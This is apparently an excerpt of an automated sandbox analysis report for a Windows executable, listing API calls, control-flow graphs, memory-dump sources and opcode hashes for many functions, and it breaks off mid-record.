                                                                                  • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                  • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                  • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                  • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID: .tmp$y@
                                                                                  • API String ID: 2030045667-2396523267
                                                                                  • Opcode ID: d4ac7463dbf5d161e361ca9bc326db0ca40d9a64499bf0d63171a4d21a2c3052
                                                                                  • Instruction ID: b6b31011a0dd284aafbaa2c2e49cce084e53b2f1e69b481334740b61ed9710c2
                                                                                  • Opcode Fuzzy Hash: d4ac7463dbf5d161e361ca9bc326db0ca40d9a64499bf0d63171a4d21a2c3052
                                                                                  • Instruction Fuzzy Hash: DA41A171704200DFD715EF65EED1A1A77A5E749304B61853AF804B73E1C679AC10CBAD

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message
                                                                                  • String ID: .tmp$y@
                                                                                  • API String ID: 2030045667-2396523267
                                                                                  • Opcode ID: 0c9aecb76b7a3e7a11760fd8a915a701fd69e196c0d41de26bbb48f3063f32c7
                                                                                  • Instruction ID: ebe7ed5bd99e4afc73068d402fc5cc7c846ae42ea211bad011db29787866ec42
                                                                                  • Opcode Fuzzy Hash: 0c9aecb76b7a3e7a11760fd8a915a701fd69e196c0d41de26bbb48f3063f32c7
                                                                                  • Instruction Fuzzy Hash: 4B41A070700200DFC711EF65DED6A5A77A5EB49304B61463AF804B73E2CAB9AC10CBAD

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                  • String ID: .tmp
                                                                                  • API String ID: 1375471231-2986845003
                                                                                  • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                  • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                  • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                  • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 277 401430-40143d 278 401446-40144c 277->278 279 40143f-401444 277->279 280 401452-40146a VirtualAlloc 278->280 279->280 281 40146c-40147a call 4012e4 280->281 282 40148f-401492 280->282 281->282 285 40147c-40148d VirtualFree 281->285 285->282
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$AllocFree
                                                                                  • String ID: DRt
                                                                                  • API String ID: 2087232378-1463252733
                                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 351 407749-40774a 352 4076dc-4076e6 WriteFile 351->352 353 40774c-40776f 351->353 355 4076e8-4076ea call 40748c 352->355 356 4076ef-4076f2 352->356 354 407770-407785 353->354 357 407787 354->357 358 4077f9 354->358 355->356 360 407700-407704 356->360 361 4076f4-4076fb call 4073ec 356->361 362 40778a-40778f 357->362 363 4077fd-407802 357->363 364 40783b-40783d 358->364 365 4077fb 358->365 361->360 369 407803-407819 362->369 371 407791-407792 362->371 363->369 367 407841-407843 364->367 365->363 370 40785b-40785c 367->370 369->370 380 40781b 369->380 372 4078d6-4078eb call 407890 InterlockedExchange 370->372 373 40785e-40788c 370->373 374 407724-407741 371->374 375 407794-4077b4 371->375 393 407912-407917 372->393 394 4078ed-407910 372->394 390 407820-407823 373->390 391 407890-407893 373->391 379 4077b5 374->379 381 407743 374->381 375->379 384 4077b6-4077b7 379->384 385 4077f7-4077f8 379->385 386 40781e-40781f 380->386 387 407746-407747 381->387 388 4077b9 381->388 384->388 385->358 386->390 387->351 389 4077bb-4077cd 387->389 388->389 389->367 395 4077cf-4077d4 389->395 396 407824 390->396 397 407898 390->397 391->397 394->393 394->394 395->364 402 4077d6-4077de 395->402 399 407825 396->399 400 40789a 396->400 397->400 403 407896-407897 399->403 404 407826-40782d 399->404 401 40789f 400->401 405 4078a1 401->405 402->354 413 4077e0 402->413 403->397 404->405 407 40782f 404->407 411 4078a3 405->411 412 4078ac 405->412 409 407832-407833 407->409 410 4078a5-4078aa 407->410 409->364 409->386 414 4078ae-4078af 410->414 411->410 412->414 413->385 414->401 415 4078b1-4078bd 414->415 415->397 416 4078bf-4078c0 415->416
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                  • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                  • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                  • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 417 401fd4-401fe6 418 401fe8 call 401918 417->418 419 401ffb-402010 417->419 423 401fed-401fef 418->423 421 402012-402017 RtlEnterCriticalSection 419->421 422 40201c-402025 419->422 421->422 424 402027 422->424 425 40202c-402032 422->425 423->419 426 401ff1-401ff6 423->426 424->425 427 402038-40203c 425->427 428 4020cb-4020d1 425->428 429 40214f-402158 426->429 432 402041-402050 427->432 433 40203e 427->433 430 4020d3-4020e0 428->430 431 40211d-40211f call 401ee0 428->431 436 4020e2-4020ea 430->436 437 4020ef-40211b call 402f54 430->437 440 402124-40213b 431->440 432->428 434 402052-402060 432->434 433->432 438 402062-402066 434->438 439 40207c-402080 434->439 436->437 437->429 443 402068 438->443 444 40206b-40207a 438->444 446 402082 439->446 447 402085-4020a0 439->447 449 402147 440->449 450 40213d-402142 RtlLeaveCriticalSection 440->450 443->444 448 4020a2-4020c6 call 402f54 444->448 446->447 447->448 448->429 450->449
                                                                                  APIs
                                                                                  • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                    • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                    • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                    • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                    • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                  • String ID:
                                                                                  • API String ID: 296031713-0
                                                                                  • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                  • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                  • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                  • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 453 401658-40168d 454 4016c7-4016cd 453->454 455 40168f-40169a 454->455 456 4016cf-4016d4 454->456 457 40169c 455->457 458 40169f-4016a1 455->458 457->458 459 4016a3 458->459 460 4016a5-4016a7 458->460 459->460 461 4016c5 460->461 462 4016a9-4016b9 VirtualFree 460->462 461->454 462->461 463 4016bb 462->463 463->461
                                                                                  APIs
                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeVirtual
                                                                                  • String ID: DRt
                                                                                  • API String ID: 1263568516-1463252733
                                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                  • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLibraryLoadMode
                                                                                  • String ID:
                                                                                  • API String ID: 2987862817-0
                                                                                  • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                  • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                  • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                  • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                  • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                  • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                  • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                  • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776
                                                                                  APIs
                                                                                  • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 1948546556-0
                                                                                  • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                  • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                  • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                  • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                  APIs
                                                                                  • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                  • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FilePointer
                                                                                  • String ID:
                                                                                  • API String ID: 1156039329-0
                                                                                  • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                  • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                  • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                  • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                  APIs
                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                    • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1658689577-0
                                                                                  • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                  • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                  • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                  • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                  • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                  • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                  • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                  • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                  • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                  • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                  • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                  • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                  APIs
                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorFileLastWrite
                                                                                  • String ID:
                                                                                  • API String ID: 442123175-0
                                                                                  • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                  • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                  • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                  • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                  APIs
                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3368672178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3368614364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368717084.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3368794275.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage
                                                                                  • String ID:
                                                                                  • API String ID: 1306739567-0
                                                                                  • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                  • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
